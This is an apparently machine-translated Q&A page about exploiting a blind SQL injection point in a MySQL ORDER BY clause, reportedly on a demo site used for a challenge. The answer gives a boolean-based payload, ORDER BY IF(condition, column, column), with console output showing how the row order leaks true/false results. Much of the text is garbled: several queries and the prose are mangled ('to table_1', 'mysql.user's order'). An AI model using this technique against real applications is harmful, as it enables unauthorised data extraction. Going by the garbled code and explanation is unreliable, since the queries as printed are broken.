mysql - Crafting a query for Blind SQL Injection -

I have found that my demo website is weak for SQL injection (I am currently doing a CH)

The injected point of the search is as follows:

  SELECT column_1, column_2, column_3 to table_1 where column_4 = '3' with order ID * * injection point * Code>  
 Now I need a craft that can help me to take advantage of this injection point which I have searched. As far as I know that UNION will not work after the  ORDER BY . However, I think the blind can work under SQL injection table as  
  SELECT column_1, column_2, column_3, where id [column1 = 1 '3' order] by ID if 1 = 1 then 1, empty]   
 Now if the 1 injection is posted then the query returns an error to the query, although its empty query query will execute ... THUS Blind SQL injection works  
 Can someone please give me  if   sql  in  A query with a PL  can help in craft, because I do not know how to use  in sql   
 tried to do this injection but work Not  
 (IF (1 = 2) then 1 endif)  
 Full question  
  SELECT column_1, column_2, column_3 to `table_1` WHERE` column_4` = '[[available injection point *]' id [* available injection point *] ASC limit [Available injection point *], [* available injection point *]    
 
 
 if  come D is not in the result set and another column whose values ​​are unique according to the  id , you can do the following:  
 
  Identify the order of unique copy id values ​​with unique_per_id , separated by the  id , use  desc  on  desc  only , If necessary).  
 Boolean-based blind injection is possible , if (1 = 1, unique_per_id, id) .   
 Example:  
  mysql> Select host from mysql.user's order by user; + ----------- + ------------------ + | | Host User | + ----------- + ------------------ + | | Localhost | Root | | 127.0.0.1 | Root | + ----------- + ------------------ + 2 lines set (0.00 seconds) mysql & gt; User, select user by host mysql.user's order; + ----------- + ------------------ + | | Host User | + ----------- + ------------------ + | | 127.0.0.1 | Root | | Localhost | Root | + ----------- + ------------------ + 2 lines set (0.00 seconds) mysql & gt; User by mysql.user command, select user, if (1 = 1, host, user); + ----------- + ------------------ + | | Host User | + ----------- + ------------------ + | | 127.0.0.1 | Root | | Localhost | Root | + ----------- + ------------------ + 2 lines set (0.00 seconds) mysql & gt; User by mysql.user command, select user, if (1 = 0, host, user); + ----------- + ------------------ + | | Host User | + ----------- + ------------------ + | | Localhost | Root | | 127.0.0.1 | Root | + ----------- + ------------------ + 2 lines set (0.00 seconds)   
 Therefore, whenever the  order is  with the order (expr, host, user)  with the same order, with the  host  (second query), the condition is  Expr  was true.